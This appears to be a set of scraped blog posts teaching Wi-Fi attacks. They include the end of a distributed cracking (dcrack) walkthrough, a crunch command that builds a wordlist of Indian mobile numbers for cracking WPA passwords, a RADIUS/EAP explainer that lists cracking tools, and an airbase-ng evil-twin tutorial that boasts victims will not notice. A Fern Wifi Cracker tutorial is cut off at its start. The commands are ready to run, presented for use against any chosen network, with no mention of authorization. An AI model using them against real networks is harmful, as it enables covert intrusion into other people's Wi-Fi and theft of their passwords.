<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>CLIENT 1 LOG ON SERVER</b> (Client sending the password to the server)</div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/--zGnWxFHgf0/UebHShYBiZI/AAAAAAAAAVw/g7p7w7gfmAo/s1600/dcrack-user-status-log.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/--zGnWxFHgf0/UebHShYBiZI/AAAAAAAAAVw/g7p7w7gfmAo/s1600/dcrack-user-status-log.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
as you all can see above, CLIENT 1 found the key from the wordlist.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
The user can check the status of the cracking using the below command :</div>
<br />
<blockquote class="tr_bq" style="text-align: center;">
<b>python dcrack.py cmd 192.168.1.128 status</b></blockquote>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Bb4jfhtl-BM/UebHS0ZkZdI/AAAAAAAAAV0/6HD5Koygtvw/s1600/dcrack-user-status.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-Bb4jfhtl-BM/UebHS0ZkZdI/AAAAAAAAAV0/6HD5Koygtvw/s1600/dcrack-user-status.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<br />
<div style="text-align: center;">
Phew !!</div>
<div style="text-align: center;">
Too Long ... ha ha :D</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
That's all guys... i hope you like it.</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
Abyss Zircanavohttp://www.blogger.com/profile/17618036098642560367noreply@blogger.com3tag:blogger.com,1999:blog-9021539595109195852.post-77256052753527315742013-05-16T14:00:00.000+05:302013-09-23T17:43:33.765+05:30EXPERIMENT -- Connecting Alfa card with the "Satellite dish antenna"<br />
Yesterday i was just experimenting on alfa card and the things that i found was quite exciting.<br />
<br />
I removed the antenna of the alfa card and i connected my alfa card with my Laptop without the antenna to check the networks in the vicinity.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Z3GUAv72MhI/UZSS48f788I/AAAAAAAAASs/jkEipI4dCI8/s1600/IMAG0087.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://1.bp.blogspot.com/-Z3GUAv72MhI/UZSS48f788I/AAAAAAAAASs/jkEipI4dCI8/s640/IMAG0087.jpg" width="640" /></a></div>
<br />
<br />
i got only a single network and that was my home wireless network.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-yQRq9SYaDKw/UZST2ux1PgI/AAAAAAAAAS4/32NUZoMqx4w/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://2.bp.blogspot.com/-yQRq9SYaDKw/UZST2ux1PgI/AAAAAAAAAS4/32NUZoMqx4w/s640/1.png" width="640" /></a></div>
<span id="goog_1448899934"></span><span id="goog_1448899935"></span><br />
<br />
The airodump result :<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-p3aA57p0q_A/UZSh1sQ1YDI/AAAAAAAAATg/Yj_roSzXJCk/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://2.bp.blogspot.com/-p3aA57p0q_A/UZSh1sQ1YDI/AAAAAAAAATg/Yj_roSzXJCk/s640/2.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
Signal and Noise Level:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-Dc7ZB5HxkRg/UZShssMgSII/AAAAAAAAATQ/lAsX3elBm-o/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://3.bp.blogspot.com/-Dc7ZB5HxkRg/UZShssMgSII/AAAAAAAAATQ/lAsX3elBm-o/s640/1.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
After that i Followed these steps:<br />
<br />
1. I Removed the dish antenna cable connecting to the set top box.<br />
<br />
2. I binded the male type connector of the satellite dish antenna (connecting to the set top box) with the copper wire (which is used in the earphone) using a plastic Clip.<br />
<br />
3. I then binded the other end of the copper wire with the alfa card male type connector.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-W1TAhIgkd7U/UZSSzUr6QxI/AAAAAAAAASc/1G6dGPEAeys/s1600/IMAG0085.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://4.bp.blogspot.com/-W1TAhIgkd7U/UZSSzUr6QxI/AAAAAAAAASc/1G6dGPEAeys/s640/IMAG0085.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ubgAh7ONfq8/UZSSy2KBm7I/AAAAAAAAASU/dP5lOna7FN4/s1600/IMAG0086.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://4.bp.blogspot.com/-ubgAh7ONfq8/UZSSy2KBm7I/AAAAAAAAASU/dP5lOna7FN4/s640/IMAG0086.jpg" width="640" /></a></div>
<br />
<br />
Now i know its kind of weird but after configuring this setup, i connected the alfa card with my Laptop and guess what? i was able to get 3 networks with a high range.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-xNdH1E0kZHw/UZSS0wzIjPI/AAAAAAAAASk/XgSpd9-goPM/s1600/IMAG0084.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://4.bp.blogspot.com/-xNdH1E0kZHw/UZSS0wzIjPI/AAAAAAAAASk/XgSpd9-goPM/s640/IMAG0084.jpg" width="360" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-hGDGNmw89L4/UZST41EXLkI/AAAAAAAAATA/9P0iTKahkRs/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://2.bp.blogspot.com/-hGDGNmw89L4/UZST41EXLkI/AAAAAAAAATA/9P0iTKahkRs/s640/2.png" width="640" /></a></div>
<br />
<br />
Airodump result:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-phlW0vzLk4c/UZSh3BugYxI/AAAAAAAAATo/LE6owTwVhMg/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://1.bp.blogspot.com/-phlW0vzLk4c/UZSh3BugYxI/AAAAAAAAATo/LE6owTwVhMg/s640/4.png" width="640" /></a></div>
<br />
<br />
Signal and Noise Level :<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-6miOhI3eFW8/UZShuKqiYiI/AAAAAAAAATY/01-FtjPamTE/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://3.bp.blogspot.com/-6miOhI3eFW8/UZShuKqiYiI/AAAAAAAAATY/01-FtjPamTE/s640/3.png" width="640" /></a></div>
<br />
<br />
Am still doing some experiments to increase the gain for the antennaAbyss Zircanavohttp://www.blogger.com/profile/17618036098642560367noreply@blogger.com3tag:blogger.com,1999:blog-9021539595109195852.post-88473696025346078032013-04-16T04:01:00.003+05:302013-09-23T17:43:06.321+05:30WPA/WPA2 cracking dictionary. Human Stupidity !!<br />
<div style="text-align: center;">
Hi guys,</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
I have seen so many threads related to WPA cracking using dictionary so i thought i should share some of my techniques by which you can increase the chance of getting the WPA/WPA2 password.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
In India (as i don't know about other countries), i have seen many people using wifi with WPA/WPA2 encryption enabled which is good actually. ya i know that its hard for a hacker to crack WPA/WPA2 password when he/she doesn't have a proper dictionary but there is one thing that many guys do forget, its the "Human Stupidity" Factor :D</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
People may have secure their wifi with WPA/WPA2 encryption but one thing that i noticed till now is that many people choose their wifi password as their<b> own mobile number</b> or their <b>gf, wife, parents, relatives mobile number.</b></div>
<div style="text-align: center;">
We only need to create a dictionary which will consist of all the mobile numbers. You think it's hard?</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Actually its kinda easy !! :D :D</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">thinking how?</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Lets see,</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
what i said earlier that people chooses mobile number for their password, so we'll create a dictionary containing the mobile numbers.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
now lets say there's a phone number like 9876543211</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
(there are many series like 99XX, 98XX, 97XX etc.)</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
we just need to create dictionary starting with number 9 (for the 9 Series of numbers. for 7 or 8 series of numbers u can add 7 or 8 also) like 900 till 99 but here you only need to chance the other 9 digits except the 1st digit. </div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
For creating dictionary you can use "crunch" (a really nice tool). the total size for 10 digit numbers 0987654321 is 102GB but you need to create dictionary for only 9 digits as the 1st digit will remain the same. so now the size would be only 10GB.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">how to use crunch to create this kinda dictionary?</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Lets see then,</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
first you need to go to the </div>
<div style="text-align: center;">
<br /></div>
<blockquote class="tr_bq" style="text-align: center;">
<span style="color: purple;"><b>/pentest/passwords/crunch/ directory</b></span></blockquote>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
then you have to type</div>
<div style="text-align: center;">
<br /></div>
<blockquote class="tr_bq" style="text-align: center;">
<span style="color: purple;"><b> ./crunch 10 10 -t 9%%%%%%%%% -o wordlist.lst</b></span></blockquote>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
what your asking crunch to do is to create a dictionary with minimum and maximum 10 digits and also no need to change the 1st digit as it will remain same and change the other 9 digits accordingly and finally store the file (in this case its wordlist.lst)</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
the above code will generate a dictionary of 10GB in size which you can use to crack WPA/WPA2 passwords.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
that's all !</div>
Abyss Zircanavohttp://www.blogger.com/profile/17618036098642560367noreply@blogger.com1tag:blogger.com,1999:blog-9021539595109195852.post-39532812578439672222013-03-23T03:46:00.000+05:302013-09-23T17:42:59.948+05:30RADIUS Server !!<br />
<br />
<br />
<br />
<div style="text-align: center;">
<span style="font-size: x-large;">What is a RADIUS server?</span></div>
<div style="text-align: center;">
its a server which is used to authenticate clients using the RADIUS (Remote Authentication Dial In User Service) client/server protocol. it uses a AAA (Authentication, Authorization, Accounting) concept. RADIUS servers are used by many companies, organizations, universities and especially ISPs. When you dial in to the ISP you must enter your username and password. This information is passed to a RADIUS server, which checks that the information is correct, and then authorizes access to the ISP system. it uses UDP ports 1812 for RADIUS Authentication and 1813 for RADIUS Accounting.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: x-large;">Why RADIUS server used?</span></div>
<div style="text-align: center;">
RADIUS serves three functions:</div>
<div style="text-align: center;">
1. to authenticate users or devices before granting them access to a network,</div>
<div style="text-align: center;">
2. to authorize those users or devices for certain network services and</div>
<div style="text-align: center;">
3. to account for usage of those services.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: x-large;">RADIUS server in Wireless Networks.</span></div>
<div style="text-align: center;">
RADIUS server used in wireless networks manages the wireless clients. for wireless, it uses 802.1X authentication scheme. The big advantage of WPA/WPA2-RADIUS authentication is that wireless encryption keys are issued by the RADIUS server and are unique to each connection and session. That eliminates distributing a shared key to all users, which might easily be compromised. The RADIUS protocol does not transmit passwords in cleartext between the NAS and RADIUS server. Rather, a shared secret is used along with the MD5 hashing algorithm to obfuscate passwords.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: x-large;">Difference between WPA-Enterprise and WPA2-Enterprise.</span></div>
<div style="text-align: center;">
The main difference between WPA-Enterprise and WPA2-Enterprise is the same as WPA & WPA2-Personal except that in Enterprise both needs a RADIUS server to authenticate the client.</div>
<div style="text-align: center;">
*NOTE WPA uses TKIP Cipher with MD5 hashing algorithm but WPA2 uses AES-CCMP Cipher with SHA1 hashing algorithm.</div>
<div style="text-align: center;">
Its mostly recommended to choose WPA2-Enterprise over WPA-Enterprise.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: x-large;">Types of Authentication Mechanism in RADIUS server.</span></div>
<div style="text-align: center;">
There are many authentication mechanisms in RADIUS server but the most common and widely used are as follows:</div>
<div style="text-align: center;">
EAP-MD5</div>
<div style="text-align: center;">
LEAP </div>
<div style="text-align: center;">
EAP-TLS</div>
<div style="text-align: center;">
PEAP</div>
<div style="text-align: center;">
EAP-TTLS and </div>
<div style="text-align: center;">
EAP-FAST </div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">EAP-MD5</span></div>
<div style="text-align: center;">
EAP-MD5-Challenge enables a RADIUS server to authenticate a connection request by verifying an MD5 hash of a user's password. The server sends the client a random challenge value, and the client proves its identity by hashing the challenge and its password with MD5. EAP-MD5-Challenge is typically used on trusted networks where risk of packet sniffing or active attack are fairly low. Because of significant security vulnerabilities, EAP-MD5-Challenge is not usually used on public networks or wireless networks, because third parties can capture packets and apply dictionary attacks to identify password hashes. Because EAP-MD5-Challenge does not provide server authentication, it is vulnerable to spoofing (a third party advertising itself as an access point).</div>
<div style="text-align: center;">
Tool to crack this authentication mechanism : eapmd5pass, eapmd5crack</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
By default, the EAP-MD5-Challenge password protocol is available for use by the Native and Unix authentication methods.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">LEAP (Lightweight Extensible Authentication Protocol)</span></div>
<div style="text-align: center;">
LEAP was developed by Cisco Systems. LEAP uses a modified version of MS-CHAP( Microsoft version of the Challenge-Handshake Authentication Protocol), an authentication protocol in which user credentials are not strongly protected and are thus easily compromised.</div>
<div style="text-align: center;">
Tool to crack this authentication mechanism : ASLEAP, THC-leapcracker</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Cisco recommends to use newer and stronger EAP protocols such as EAP-FAST, PEAP, or EAP-TLS.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">EAP-TLS (EAP-Transport Layer Security)</span></div>
<div style="text-align: center;">
EAP-TLS uses the Transport Layer Security (TLS) protocol. EAP-TLS require the client to use X.509 certificates. TLS is generally accepted as the most secure, because it depends on certificates. A compromised password is not enough to break into EAP-TLS enabled systems because the intruder still needs to have the client-side private key(Certificate). The highest security available is when client-side keys are housed in "smart cards". This is because there is no way to steal a certificate's corresponding private key from a smart card without stealing the card itself.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">PEAP (Protected Extensible Authentication Protocol)</span></div>
<div style="text-align: center;">
PEAP is similar to EAP-TTLS. It encapsulates EAP within a potentially encrypted and authenticated Transport Layer Security (TLS) tunnel. PEAP requires only a server-side PKI (Public Key Infrastructure) certificate to create a secure TLS tunnel to protect user authentication, and uses server-side public key certificates to authenticate the server. It then creates an encrypted TLS tunnel between the client and the authentication server.</div>
<div style="text-align: center;">
Tool to crack this authentication mechanism : ASLEAP</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">EAP-TTLS (EAP-Tunneled Transport Layer Security)</span></div>
<div style="text-align: center;">
EAP-TTLS (Tunneled Transport Layer Security) is designed to provide authentication that is as strong as EAP-TLS, but it does not require that each user be issued a certificate. Instead, only the authentication servers are issued certificates. User authentication is performed by password, but the password credentials are transported in a securely encrypted tunnel established based upon the server certificates. It does not require the client be authenticated to the server with a digitally signed certificate by the CA. The server uses the secure TLS tunnel to authenticate the client with password and key exchange mechanism. TTLS implementations today support all methods defined by EAP, as well as several older methods</div>
<div style="text-align: center;">
(CHAP, PAP, MS-CHAP and MS-CHAPv2).</div>
<div style="text-align: center;">
Tool to crack this authentication mechanism : ASLEAP</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">EAP-FAST (EAP-Flexible Authentication via Secure Tunneling)</span></div>
<div style="text-align: center;">
It was a replacement for LEAP. EAP-FAST uses a Protected Access Credential (PAC) to establish a TLS tunnel in which client credentials are verified. When automatic PAC provisioning is enabled, EAP-FAST has a slight vulnerability that an attacker can intercept the PAC and subsequently use that to compromise user credentials. There is also a vulnerability where an attacker's AP can use the same SSID, reject the users PAC and supply a new one. Most supplicants can be set to prompt the user this credentials using the inner method to the hacker, who will then get either a cleartext password or a vulnerable to dictionary attack MSCHAPv2 hash.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Reference: Google :D</div>
<br />
<br />
<br />Abyss Zircanavohttp://www.blogger.com/profile/17618036098642560367noreply@blogger.com0tag:blogger.com,1999:blog-9021539595109195852.post-7818253948992609222013-03-03T17:45:00.001+05:302013-09-23T17:42:49.968+05:30ANOTHER EASY WAY TO GET THE WPA HANDSHAKE<div style="text-align: center;">
<span style="color: purple;">Hey guys,</span></div>
<br />
<div style="text-align: center;">
<span style="color: purple;">here's my another tutorial on how to get the WPA HANDSHAKE (for cracking WPA encryption) in an VERY EASY WAY !!</span></div>
<span style="color: purple;"></span><br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<span style="color: purple;">
<div style="text-align: center;">
PRE-REQUISITES</div>
</span><br />
<br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple;"># You Should have a wireless card which supports "PACKET INJECTION".</span></div>
<br />
<div style="text-align: center;">
<span style="color: purple;"># Your wireless card should be on the monitor mode (Recommended) </span></div>
<br />
<div style="text-align: center;">
<span style="color: purple;"># Naaaaaa that's all :P</span></div>
<span style="color: purple;"></span><br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<span style="color: purple;">
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
ok then Lets Start...</div>
</span><br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple;"># Run airodump-ng to start monotoring the air.</span></div>
<div style="text-align: center;">
<br /></div>
<blockquote class="tr_bq">
<div style="text-align: center;">
<span style="font-size: large;"><b>airodump-ng mon0</b></span></div>
</blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-of4vkQAXFdE/UTM7BGINn2I/AAAAAAAAARg/PWDWVPi6L24/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="359" src="http://4.bp.blogspot.com/-of4vkQAXFdE/UTM7BGINn2I/AAAAAAAAARg/PWDWVPi6L24/s640/3.png" width="640" /></a></div>
<br />
<div style="text-align: center;">
<span style="color: purple;">if you have wireless networks in the vicinity then you'll be able to see a list of networks.</span></div>
<br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple;"># choose a network for which you want to get the WPA HANDSHAKE.</span></div>
<br />
<br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple;">#After Selecting the Network, you need the following info. from that network :</span></div>
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<br />
<span style="color: purple; text-align: center;"></span><br />
<div style="text-align: center;">
<span style="color: purple; text-align: center;">BSSID (MAC Address of the AP)</span></div>
<span style="color: purple; text-align: center;">
</span><span style="color: purple; text-align: center;"><div style="text-align: center;">
ESSID (Name of the AP)</div>
</span><span style="color: purple; text-align: center;"><div style="text-align: center;">
CHANNEL</div>
</span><span style="color: purple; text-align: center;"><div style="text-align: center;">
CIPHER TYPE</div>
</span><br />
<ul>
</ul>
<div>
<div style="text-align: center;">
<span style="color: purple;"># Now open a new terminal and type the following command:</span></div>
<div style="text-align: center;">
<br /></div>
<blockquote class="tr_bq">
<div style="text-align: center;">
<span style="font-size: large;"><b>airbase-ng -a <bssid> --essid "<essid>" -c <channel> -F <location> -v -z 4 -V 3 -P -I 10 -C 15 mon0</b></span></div>
</blockquote>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-IHAGMTRsxlU/UTM67mQoWqI/AAAAAAAAARU/S57msZ7aENs/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="359" src="http://2.bp.blogspot.com/-IHAGMTRsxlU/UTM67mQoWqI/AAAAAAAAARU/S57msZ7aENs/s640/4.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-a bssid : set Access Point MAC address</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-v : verbose (print more messages)</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-c channel : sets the channel the AP is running on</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-z type : sets WPA1 cipher tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-Z type : same as -z, but for WPA2</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-V type : fake EAPOL 1=MD5 2=SHA1 3=auto</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-F prefix : write all sent and received frames into pcap file</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-P : respond to all probes, even when specifying ESSIDs</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-I interval : sets the beacon interval value in ms</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">-C seconds : enables beaconing of probed ESSID values (requires -P)</span></div>
</div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">#Airbase is a tool used for creating a fake AP. Here create the fake AP with the same BSSID, ESSID, CHANNEL and CIPHER type as the network's that you want to get the WPA HANDSHAKE from.</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;">in the above, i used the "-z 4" switch which tells that the network has a CCMP cipher type and in "-V 3", i am generating fake EAPOL packets.</span></div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
</div>
<div style="text-align: justify;">
<br />
<div style="text-align: center;">
<span style="color: purple;">#Now comes the Signal Game, if you have a higher signal strength than the other network, then without even deautheticating the clients, you'll get the WPA HANDSHAKE.</span></div>
<span style="color: purple;"></span><br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<span style="color: purple;">
<div style="text-align: center;">
"Here is the best part, the client will not even know that his/her network is under attack :D :D</div>
<div style="text-align: center;">
because we are not deauthenticating him/her from the AP :D :D"</div>
</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-cRjTMeSmw6A/UTM6_mUrL6I/AAAAAAAAARc/9-tmLWHji5A/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="359" src="http://4.bp.blogspot.com/-cRjTMeSmw6A/UTM6_mUrL6I/AAAAAAAAARc/9-tmLWHji5A/s640/5.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br />
<div style="text-align: center;">
<span style="color: purple;">here you see "Client <client_mac> is associated (WPA1:CCMP) to BSSID: <essid> "</span></div>
<span style="color: purple;"></span><br />
<div style="text-align: center;">
<span style="color: purple;">this means that the client is connected with your fake AP and we have just received the WPA handshake (You still need atleast 3-4 messages like that to properly get the WPA handshake)</span></div>
<span style="color: purple;">
</span></div>
<div style="text-align: justify;">
<br />
<div style="text-align: center;">
<span style="color: purple;"># now just close it... your done !! :P</span></div>
<span style="color: purple;"></span><br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<span style="color: purple;">
<div style="text-align: center;">
#for checking if we got the WPA handshake or not, run this command:</div>
</span></div>
<div style="text-align: justify;">
<div style="text-align: center;">
<br /></div>
</div>
<blockquote class="tr_bq">
<div style="text-align: center;">
<span style="font-size: large;"><b>aircrack-ng <location of the pcap file> -w <wordlist></b></span></div>
</blockquote>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-vb8t5lrmNZM/UTM7GSo6ClI/AAAAAAAAARs/nSt2z0voizw/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="359" src="http://4.bp.blogspot.com/-vb8t5lrmNZM/UTM7GSo6ClI/AAAAAAAAARs/nSt2z0voizw/s640/6.png" width="640" /></a></div>
<br />
<br />
<div style="text-align: center;">
<span style="color: purple;">as you can see here, i have got a handshake </span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-_zqgui4ryFI/UTM7JXsjYEI/AAAAAAAAAR0/nFVaicfGFnw/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="359" src="http://3.bp.blogspot.com/-_zqgui4ryFI/UTM7JXsjYEI/AAAAAAAAAR0/nFVaicfGFnw/s640/7.png" width="640" /></a></div>
<br />
<br />
<br />
<div style="text-align: center;">
<span style="color: purple;">That's all ...</span></div>
<span style="color: purple;"></span><br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<span style="color: purple;">
<div style="text-align: center;">
i hope its helpful to you all :-)</div>
</span><br />
<br />
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple;">Thanks for reading !!</span></div>
Abyss Zircanavohttp://www.blogger.com/profile/17618036098642560367noreply@blogger.com0tag:blogger.com,1999:blog-9021539595109195852.post-50828959813832437902012-09-12T02:00:00.002+05:302013-09-23T17:42:40.483+05:30[TUT] WPA2 CCMP Cracking using Fern Wifi Cracker [TUT]<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">hey guys !!</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">day before yesterday i made a tutorial on WEP cracking using a build-in tool called "fern wifi cracker"...</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">today i'll show you how to crack WPA2 CCMP using the same tool...</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">so now let us begin..</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;">open fern wifi cracker...</span></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-NHUQ-dvuFC4/UE-bZA_6fQI/AAAAAAAAAOE/jc_XDJoCu_g/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="480" src="http://1.bp.blogspot.com/-NHUQ-dvuFC4/UE-bZA_6fQI/AAAAAAAAAOE/jc_XDJoCu_g/s640/1.jpg" width="640" /></a></div>
<div style="text-align: center;">
<span style="color: purple; font-size: large;"><br /></span>
